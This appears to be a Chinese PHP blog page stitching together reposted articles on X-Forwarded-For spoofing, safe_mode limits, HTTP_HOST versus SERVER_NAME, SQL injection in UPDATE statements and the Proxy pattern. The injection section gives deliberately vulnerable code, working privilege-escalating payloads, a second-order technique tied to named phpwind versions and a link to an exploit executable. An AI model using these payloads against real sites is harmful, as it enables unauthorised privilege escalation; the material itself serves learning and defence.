说实话,通过代理访问之类的以前都曾关注过,但伪造来源IP还真没注意过。以下的文章内容我没有测试过,仅仅了解一个想法,或许真可以,或许早就不行。但既然有第一次以后就会有第二次。了解入侵途径、方法,在遇到问题的时候岂不更好、更容易多一个技能来解决它?
原文来自:简单伪造X-Forwarded-For
关于伪造X-Forwarded-For的目的我就不多说了。在入侵一个PHP站,GPC为ON的时候,
字符型注入全部歇菜,而在PHP5中,GPC默认是打开的。但是GPC对$_SERVER无任何影响,
因此可以通过伪造$_SERVER来达到注入的目的。
IP.php中有如下代码,主要是获取客户端IP:
PHP代码
- <?
- function GetIP() {
- if (getenv("HTTP_CLIENT_IP")){
- echo "getenvHTTP_CLIENT_IP";
- $ip = getenv("HTTP_CLIENT_IP");
- }else if (getenv("HTTP_X_FORWARDED_FOR"))
- {
- $ip = getenv("HTTP_X_FORWARDED_FOR");
- echo "getenvHTTP_X_FORWARDED_FOR";
- echo "<br>you are right";
- }else if (getenv("REMOTE_ADDR")){
- echo "getenvREMOTE_ADDR";
- $ip = getenv("REMOTE_ADDR");
- }else{
- echo "unknow";
- $ip = "Unknown";
- }
- return $ip;
- }
- echo GetIp();
- ?>
1.直接访问IP.PHP时,返回getenv REMOTE_ADDR127.0.0.1
2.用NC提交:
GET /1.php HTTP/1.1
Accept: */*
Referer: http://localhost/
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MAXTHON 2.0)
Host: localhost
Connection: Keep-Alive
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.2
Cookie: rtime=0; ltime=1269249140109; cnzz_eid=64110124-1269242429-; language=zh-cn; PHPSESSID=ae9b14609808b4ff4c5811ad1943c529
返回getenvHTTP_X_FORWARDED_FOR127.0.0.2。
伪造X-Forwarded-For成功。
要想提高程序的安全性,不是一个GPC可以解决的,必须提高程序的过滤机制,因为任何的参数提交都是
有害的!
--EOF--
如果上述属实,那就太痛苦了,啥也不能信了。这年头,连X萝卜也靠不住了。
这是风雪之隅的文章,主要是我正好也有类似的情况发生,先介绍完他的事件后,我再贴出我问题吧。
原文地址为:ini_set memory_limit在safe_mode下不可用
内容如下:
如果你ini_set(“memory_limit”, *)返回了false,不妨检查下, 是否开启了安全模式(手册中没有述及)..
一句话, 记录下:在安全模式下不能使用ini_set的指令:
XML/HTML代码
- 1. max_execution_time
- 2. memory_limit
- 3. child_terminate
--EOF--
附:上文说的ini_set的问题,可以查看一下手册的Chapter 9. Runtime Configuration之How to change configuration settings。
风雪之隅的这个问题其实很常见,但却不会影响系统运行,无非是设置返回false了而己,但我说的是set_time_limit(),这个函数事实上也不会在safe_mode里运行,而且如果你开启了error_reporting(7)后,系统好象是直接无法访问【单位的网站就因为这个而导致程序出错】,由于我仅仅加了这一行,所以我在这行下面加上exit()后才发现safe_mode下,无法set_time_limit。其实这就是上面所说的ini_set中不能使用的max_execution_time。但问题是set_time_limit会有出错信息,而ini_set仅仅返回false。。这是两个不同的概念。
因此,如果你的服务器开启了safe_mode,你一定要看手册的这一章节:Functions restricted/disabled by safe mode。否则遇到问题,你会很头疼的。有的服务器喜欢在上传后直接把文件改到某个用户组,甚至改UID,如果这样,那move_upload_files就不能使用了。当然这种情况很少见,只是需要注意一下。
还有一些函数,也不再能够被使用。多看看手册,真好。
看到网上有篇文章,说是$_SERVER变量中的HTTP_HOST与SERVER_NAME不一样,打开网址后HTTP_HOST是全域名,而SERVER_NAME会显示根域名。
但是我采用了phpinfo看了一下,HTTP_HOST和SERVER_NAME是相同值,而并非是所说的不一样。
代码如下:
上面这段简单的代码里会显示$_SERVER变量的内容,搜索一下,HTTP_HOST与SERVER_NAME是一样的,都是www.neatstudio.com,当然这时候,我的路径是http://www.neatstudio.com/info.php,于是我尝试用http://neatstudio.com/info.php访问时,这两个值还是一样,当然都变成了neatstudio.com。
于是我翻开了手册想看看是怎么回事,为什么会有人说不一样。
手册上这么说:
- '
SERVER_NAME' -
The name of the server host under which the current script is executing. If the script is running on a virtual host, this will be the value defined for that virtual host.
- '
HTTP_HOST' -
Contents of the Host: header from the current request, if there is one.
看了上面的解释也基本上可以断定它基本是一样的,除非同一台服务器只有一个网站,但SERVER_NAME却与HOST不一样,或许会出现不同值。如果是虚拟主机,默认会以虚拟主机的值为准。为了测试,我在本地做了一个测试。
在hosts文件里加了127.0.0.1 www.neatcn.com 127.0.0.1 neatcn.com对应两个域名【强制在本地指定,否则会到使用域名真实IP】
然后在virtual host里,更换不同的ServerName 为neatcn.com和www.neatcn.com,但结果,都是根据访问路径来的,不管使用何种域名,HTTP_HOST和SERVER_NAME都是一致的,与访问路径中的hostname一致。
再对应一下那篇文章 ,由此基本可以鉴定那是一个SEO的文章,因为他在同一篇文章里介绍了两个域名还都不一致。唉。。。SEO沦落到如此地步了,刚开始看到的时候,我本来以为很激动的,我想着以后取根域名就方便了。不需要象现在还要根据不同的域名根来取根域名。。。
寂寞hack的文章,简单的介绍了一些注入方法,可以了解一下,但并没有那样的实用,经知道现在很多框架、代码都采用了PDO,使用了prepare的方法,基本上可以避免这些问题的发生。当然,光靠这些是不一定能够完全避免的,代码上还是要严格控制一下。
原文来自于:http://hi.baidu.com/isbx/blog/item/35d86a605b1fbf48eaf8f851.html
一、测试环境
OS: Windowsxp sp2
php: php 4.3.10
mysql 4.1.9
apache 1.3.33
二、测试数据库结构
SQL代码
-
-
-
-
-
-
-
- CREATE TABLE `userinfo` (
- `groudid` varchar(12) NOT NULL default '1',
- `user` varchar(12) NOT NULL default 'heige',
- `pass` varchar(122) NOT NULL default '123456'
- ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
-
-
-
-
-
- INSERT INTO `userinfo` VALUES ('2', 'heige', '123456')
三、测试模式
1、变量没有带''或""
PHP代码
- <?php
-
- $servername = "localhost";
- $dbusername = "root";
- $dbpassword = "";
- $dbname = "test";
-
- mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
-
- $sql = "update userinfo set pass=$p where user='heige'";
-
- $result = mysql_db_query($dbname, $sql);
- $userinfo = mysql_fetch_array($result);
-
- echo "<p>SQL Query:$sql<p>";
- ?>
脚本里只是修改 user='heige' 的 pass,如果 groudid 表示用户的权限等级,我们的目的就是通过构造 $p 来达到修改 groupid 的目的,那么我们提交:
http://127.0.0.1/test1.php?p=123456,groudid=1
在mysql里查询:
SQL代码
- mysql> select * from userinfo;
- +
- | groudid | user | pass |
- +
- | 1 | heige | 123456 |
- +
- 1 row in set (0.01 sec)
用户heige的groudid又2改为1了 :)
所以我们可以得到没有''或""update的注射是可以成功的,这个就是我们的模式1。
2、变量带''或""
PHP代码
- <?php
-
- $servername = "localhost";
- $dbusername = "root";
- $dbpassword = "";
- $dbname = "test";
-
- mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
-
- $sql = "update userinfo set pass='$p' where user='heige'";
-
- $result = mysql_db_query($dbname, $sql);
- $userinfo = mysql_fetch_array($result);
-
- echo "<p>SQL Query:$sql<p>";
- ?>
为了关闭'我们构造$p应该为 123456',groudid='2 提交:
http://127.0.0.1/test2.php?p=123456',groudid='1
在gpc=on的情况下'变成了\',提交的语句变成:
SQL Query:update userinfo set pass='123456\',groudid=\'1' where user='heige'
mysql查询:
SQL代码
- mysql> select * from userinfo;
- +
- | groudid | user | pass |
- +
- | 2 | heige | 123456',groudid='1 |
- +
- 1 row in set (0.00 sec)
groudid并没有被修改。那么在变量被''或""时 就完全没有被注射呢?不是 下面我们看模式2:
PHP代码
- <?php
-
- $servername = "localhost";
- $dbusername = "root";
- $dbpassword = "";
- $dbname = "test";
-
- mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
-
- $sql = "update userinfo set pass='$p' where user='heige'";
-
- $result = mysql_db_query($dbname, $sql);
- mysql_fetch_array($result);
-
- $sql= "select pass from userinfo where user='heige'";
- $result = mysql_db_query($dbname, $sql);
- $userinfo=mysql_fetch_array($result);
-
- echo $userinfo[0];
-
- $sql ="update userinfo set pass='$userinfo[0]' where user='heige'";
- $result = mysql_db_query($dbname, $sql);
- mysql_fetch_array($result);
-
- ?>
我们测试下,提交:
http://127.0.0.1/test3.php?p=123456',groudid='1
回mysql查询下 :
SQL代码
- mysql> select * from userinfo;
- +
- | groudid | user | pass |
- +
- | 1 | heige | 123456 |
- +
- 1 row in set (0.00 sec)
HaHa~~ 成功注射 修改groudid为1。 这个就是我们的模式2了,简单的描叙如下:
update --> select --> update
四、实际模式
模式1:缺
模式2:phpwind 2.0.2和3.31e 权限提升漏洞
漏洞分析
update (profile.php 注射变量为$proicon update语句里为,icon='$userdb[icon]')
↓
select (jop.php)
↓
updtate (jop.php)
Exploit: http://www.huij.net/9xiao/up/phpwind-exploit.exe
说实话,如果不是必要,真不是特别推荐采用proxy方法。特别是在PHP中,采用proxy势必会造成include文件过多。IO的消耗非常恐怖,如果又采用openbasedir,那么还要恐怖 。性能会下降的很厉害。。。
下面是老王的文章:
模式是程序员之间的交流语言,代理(Proxy)和委派(Delegate)是模式中常见的词汇,不过很多人把他们混淆了,甚至等同起来,这会造成很多沟通交流上的误解,下面说说他们的区别,先看一个UML图:
图形已经表述的很直白了,如果还不清晰,可以看看下面的代码:
PHP代码
- interface Subject
- {
- public function DoAction();
- }
-
- class RealSubject implements Subject
- {
- public function DoAction()
- {
- echo '_RealSubject::DoAction_';
- }
- }
-
- class Proxy implements Subject
- {
- public function __construct()
- {
- $this->subject = new RealSubject();
- }
-
- public function DoAction()
- {
- echo 'Proxy::DoAction';
- $this->subject->DoAction();
- echo 'Proxy::DoAction';
- }
- }
-
- $proxy = new Proxy();
- $proxy->DoAction();
运行结果输出:Proxy::DoAction_RealSubject::DoAction_Proxy::DoAction
如果你还没有看出端倪,我就再废话几句:首先从词性来看,代理(Proxy)是名词,委派(Delegate)是动词,其次代理说明了若干个对象实现了一个共同的接口,而委派只是说明一个对象引用了另一个对象,并不牵扯接口。
既然说到这了,就再唠叨几句:什么时候适合使用Proxy模式呢?对PHP而言,一般是当需要给对象附加额外的逻辑时,而这些逻辑和原有逻辑又分属不同的 层次,此时就可以考虑使用Proxy模式。听起来有点拗口,说一个实际的例子,比如说我们实现了Article对象,里面封装了CRUD方法,现在我们要 加入权限判断,控制CRUD的访问限制,这些新加入的逻辑属于应用逻辑,而原有的逻辑属于持久化逻辑,从分层角度看它们不应该放在一个对象里,此时就可以 创建一个ArticleProxy代理对象,用来实现权限判断,至于CRUD操作,则通过委派给Article对象来完成。
当年的JIVE论坛大量使用了此类方法,不过现在JIVE论坛早已销声匿迹,但思想还是可以借鉴的。通过使用代理模式,可以把不同侧重点的逻辑分别封装到 不同的对象里去(和装饰模式有点像,至于如何区分就是另一个话题了),从而避免God Class的产生,不过这样设计的结果会产生大量的类,孰重孰轻还得视客观情况而定。
原文来自:http://hi.baidu.com/thinkinginlamp/blog/item/2297a7efcb52a31afdfa3cc2.html
老王一天到晚在研究新奇玩意,上次说在PC下安装object-C,也是我挺喜欢的。
